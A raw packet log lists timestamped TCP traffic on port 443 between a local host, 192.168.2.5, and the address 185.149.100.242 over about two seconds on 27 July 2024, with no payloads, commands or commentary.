Jul 27, 2024 07:30:16.541659117 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.541671991 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.541805029 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.541812897 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.541867018 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.580884933 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.580899000 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.580966949 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.580976963 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.580995083 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.581022024 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.581953049 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.581965923 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.582020044 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.582026958 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.582067013 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.582659006 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.582673073 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.582741022 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.582746983 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.582789898 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.583339930 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.583353996 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.583434105 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.583441019 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.583481073 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.583909035 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.583923101 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.583961010 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.583967924 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.583981037 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.584009886 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.620589018 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.620604038 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.620680094 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.620698929 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.620871067 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.631328106 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.631355047 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.631401062 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.631408930 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.631426096 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.631500006 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.632404089 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.632417917 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.632492065 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.632497072 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.632514954 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.632533073 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.671266079 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.671299934 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.671343088 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.671350002 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.671364069 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.671394110 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.671932936 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.671953917 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.671998978 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.672004938 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.672034979 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.672054052 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.672586918 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.672607899 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.672643900 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.672648907 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.672674894 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.672689915 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.673230886 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.673253059 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.673290968 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.673297882 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.673326015 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.673342943 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.673650980 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.673679113 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.673715115 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.673721075 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.673746109 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.673758030 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.711327076 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.711368084 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.711400032 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.711409092 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.711430073 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.711448908 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.722009897 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.722035885 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.722075939 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.722086906 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.722100019 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.722131014 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.723319054 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.723340034 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.723378897 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.723386049 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.723409891 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.723419905 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.762293100 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.762320042 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.762373924 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.762382030 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.762397051 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.762429953 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.763223886 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.763247013 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.763289928 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.763294935 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.763324022 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.763333082 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.763946056 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.763964891 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.764000893 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.764005899 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.764028072 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.764045000 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.764669895 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.764689922 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.764728069 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.764738083 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.764755011 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.764771938 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.765563011 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.765584946 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.765701056 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.765707970 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.765757084 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.765765905 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.808540106 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.808568954 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.808619022 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.808631897 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.808666945 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.808679104 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.813477039 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.813525915 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.813553095 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.813560009 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.813599110 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.813599110 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.814157009 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.814201117 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.814224005 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.814229965 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.814260960 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.814271927 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.852669954 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.852698088 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.852746964 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.852756023 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.852785110 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.852792978 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.853382111 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.853403091 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.853471994 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.853477955 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.853532076 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.853928089 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.853950024 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.853988886 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.853996038 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.854024887 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.854039907 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.854593039 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.854620934 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.854660034 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.854666948 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.854697943 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.854707003 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.855215073 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.855261087 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.855273008 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.855279922 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.855313063 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.855329037 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.899652004 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.899682999 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.899743080 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.899749994 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.899777889 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.899787903 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.936974049 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.937002897 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.937088966 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.937103033 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.937146902 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.937751055 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.937772989 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.937818050 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.937825918 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.937839031 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.937861919 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.943691015 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.943711042 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.943778038 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.943784952 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.943803072 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.943821907 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.944291115 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.944318056 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.944374084 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.944380045 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.944417953 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.944914103 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.944940090 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.944974899 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.944981098 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.945009947 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.945019007 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.945734024 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.945755959 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.945805073 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.945811987 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.945837021 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.945847034 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.946451902 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.946472883 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.946528912 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.946536064 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.946576118 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.991846085 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.991875887 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.991920948 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.991928101 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.991959095 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.991967916 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.997644901 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.997665882 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.997713089 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.997720003 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.997742891 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.997755051 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.998476028 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.998495102 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.998537064 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.998541117 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:16.998568058 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:16.998579025 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:17.035705090 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:17.035725117 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:17.035803080 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:17.035824060 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:17.035871029 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:17.035933971 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:17.035959005 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:17.035995007 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:17.036000013 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:17.036021948 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:17.036046982 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:17.036056995 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:17.036083937 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:17.036123037 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:17.036129951 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:17.036173105 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:17.036726952 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:17.036747932 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:17.036787033 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:17.036794901 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:17.036814928 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:17.036834002 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:17.038466930 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:17.038486958 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:17.038546085 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:17.038552999 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:17.038595915 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:17.081533909 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:17.081557989 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:17.081675053 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:17.081697941 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:17.081746101 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:17.087462902 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:17.087482929 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:17.087548971 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:17.087562084 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:17.087603092 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:17.087996960 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:17.088016033 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:17.088078976 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:17.088093042 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:17.088129997 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.155797958 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.155813932 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.155874968 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.155885935 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.155944109 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.156757116 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.156785011 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.156825066 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.156831026 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.156843901 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.156867981 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.157505989 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.157557011 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.157574892 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.157578945 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.157603025 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.157615900 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.158492088 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.158504009 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.158560038 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.158565998 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.158605099 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.158739090 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.158762932 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.158796072 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.158801079 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.158823967 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.158832073 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.159756899 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.159776926 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.159816980 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.159821987 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.159837961 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.159857988 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.160619974 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.160641909 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.160690069 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.160696030 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.160710096 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.160728931 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.161591053 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.161618948 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.161664009 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.161669016 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.161684990 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.161701918 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.162535906 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.162561893 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.162604094 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.162606955 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.162632942 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.162646055 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.162770033 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.162790060 CEST	443	51812	185.149.100.242	192.168.2.5
